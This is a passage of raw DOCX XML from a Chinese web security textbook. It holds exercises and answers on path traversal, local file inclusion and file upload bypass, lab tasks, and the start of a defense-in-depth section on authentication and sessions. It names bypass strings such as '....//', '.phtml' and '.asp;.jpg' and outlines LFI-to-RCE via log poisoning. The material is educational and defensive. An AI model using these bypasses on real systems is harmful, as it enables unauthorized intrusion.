        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解释路径遍历能够绕开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用限制的根本原因，并说明防御中路径规范化为何优于简单的字符串替换。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如何从“信息泄露”升级为远程代码执行？请描述至少一种概念路径，并指出相应的防御措施。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么文件上传防御应使用“白名单”而非“黑名单”？给出两个现实中可能绕过的案例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题参考“攻击者视角”一节关于目录假设的打破；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题联系包含点将数据当代码执行这一注入本质；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题思考扩展名多样性和解析器特性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根本原因是应用信任用户可以安全地指定文件路径，未验证最终解析的路径是否在许可范围内。规范化能将所有相对路径转换为绝对路径，并通过前缀比对彻底避免逃逸；黑名单替换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能被双写（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">....//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或编码绕过。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以通过包含被污染的文件（如日志文件、session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件、上传的文件）执行攻击者注入的代码，例如先将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码注入到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问日志中，再通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含该日志文件。防御措施包括：禁止包含函数的动态输入、使用白名单、限制包含目录、严格日志权限等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">白名单明确列出允许的类型，天然拒绝任何未知后缀；黑名单试图枚举所有危险扩展名，但新扩展名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或大小写变种、多重扩展名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）层出不穷，极易遗漏。案例：服务端只拦截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并成功执行；或利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.asp;.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Multillidae </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PentesterLab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境复现一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志污染用例，记录需要跨过的目录层级和写入日志的方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，模拟文件上传防御：设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录禁止执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP，再尝试上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件验证效果。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="219"/>
    <w:bookmarkStart w:id="220" w:name="小结-15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历、文件包含与文件上传绕过共享一个核心假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入可以被安全地用作文件系统路径的一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。打破该假设，即实施严格的白名单与路径验证，是防御的根本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御必须覆盖输入规范、存储隔离与执行环境控制三个层面，单一措施（如仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤）无法根治。正如前文所述，身份认证需要纵深防御，文件操作同样依赖于路径规范化、最小权限和蓝队监控的协同作用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在授权靶机中实操遍历和上传绕过，能够深刻理解数据流从参数到文件操作的完整路径，进而设计更安全的文件处理逻辑。这些攻防经验，与前述的弱口令爆破、会话固定及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误用实验共同构成完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证与文件安全实践图谱。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkStart w:id="222" w:name="延伸阅读-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有关“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Path Traversal”、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Testing for Local File Inclusion”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Testing for File Upload”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的章节，详细提供了测试用例与检测方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File Upload、Directory Traversal、File Inclusion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》第二版，深入分析了文件相关漏洞的利用与防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》中与文件系统权限、进程隔离相关的基础原理（Ch13–18），对理解最小权限与文件访问控制有益。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="221" w:name="认证会话纵深防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证会话纵深防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权声明。本节所涉及靶机迁移与实践操作，仅限于读者在自建隔离实验环境（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、OWASP WebGoat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等本地或云主机官方镜像）或获得书面授权的靶机平台上进行；实验网络应与生产网络及互联网严格隔离；不得在未经授权的情况下对任何他人系统进行测试，否则将承担相应法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本章已阐明认证与会话体系面临的三大攻击面：弱口令爆破与凭证猜测、会话固定与令牌伪造、路径包含与文件上传绕过。这三类漏洞的共同根因，在于应用对客户端输入给予了超出预期的信任——信任用户所提交的口令强度、信任浏览器出示的会话标识即为初始的合法持有者、信任用户提供的文件名或路径仅指向预期资源。单独修复其中任意一个漏洞，并不能让系统达到可接受的安全水位；真正有效的防护，必须将身份、会话、输入与监控四者编织成一条纵深防御链，使得攻击者即使越过外层防线，也会被内层控制捕获。本节即对这一纵深防御体系进行系统性收束，并附以习题、小结与延伸阅读，帮助读者将攻击视角转化为蓝队防御能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证与文件类漏洞纵深防御总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御的要义，并非部署多款孤立的安全产品，而是围绕受保护资源——用户账户、会话令牌、文件系统——构建多层控制，使得每层均以“失败拒绝”为底线，并且相邻层之间存在检测覆盖的交叉。针对本章涉及的攻击手法，纵深防御可以组织为如下四个控制平面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">身份平面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接应对弱口令爆破与凭证攻击。第一条防线是强口令策略：口令长度不小于12字符，强制包含大小写字母、数字及特殊符号，且排除明显的字典词与上下文相关词（如用户名、公司名）。在历史口令泄露数据库（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Have I Been Pwned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pwned Passwords </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库）中校验用户新设口令，能有效阻断已被收录的弱口令。第二条防线是多因素认证（Multi‑Factor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication，MFA）。基于时间的一次性口令（TOTP）、物理安全密钥（U2F/FIDO2）或推送通知的认证因子，将攻击者成功爆破口令的概率从“只要猜中即可登录”降为“还需同时掌握第二因子”，这在对抗在线爆破和凭证填充时极为有效。即便如此，MFA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身并非银弹——攻击者可能通过中间人钓鱼窃取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OTP，但相比于单一口令体系，攻击成本已大幅提高。第三条防线是速率限制与账户锁定：针对单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或单账户的连续失败登录尝试，实施阶梯式延迟与临时锁定，并辅以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CAPTCHA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等挑战手段。蓝队应在认证服务器端直接实施速率限制，而不依赖客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反爆破，因为后者可被轻易绕过。防御对照：在前置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中，Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">线上爆破正是因目标缺乏速率限制而成功；蓝队可在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置规则，对单位时间内高频“401/403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录失败”事件发出告警，并结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信誉情报进行自动化阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话平面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">负责解决会话固定、劫持与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误用。会话安全管理的首要原则是“绝对不可预测”：会话标识（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）须由密码学安全随机数生成器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/urandom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或操作系统提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CSPRNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）生成，长度不低于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位，使得攻击者无法通过猜测获得有效会话。其次，Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固有的安全属性是构造安全会话的基石：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性禁止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取令牌，从根本上阻断了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窃取会话的热路径；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性保证令牌只在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信道中传输，防止中间人嗅探；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
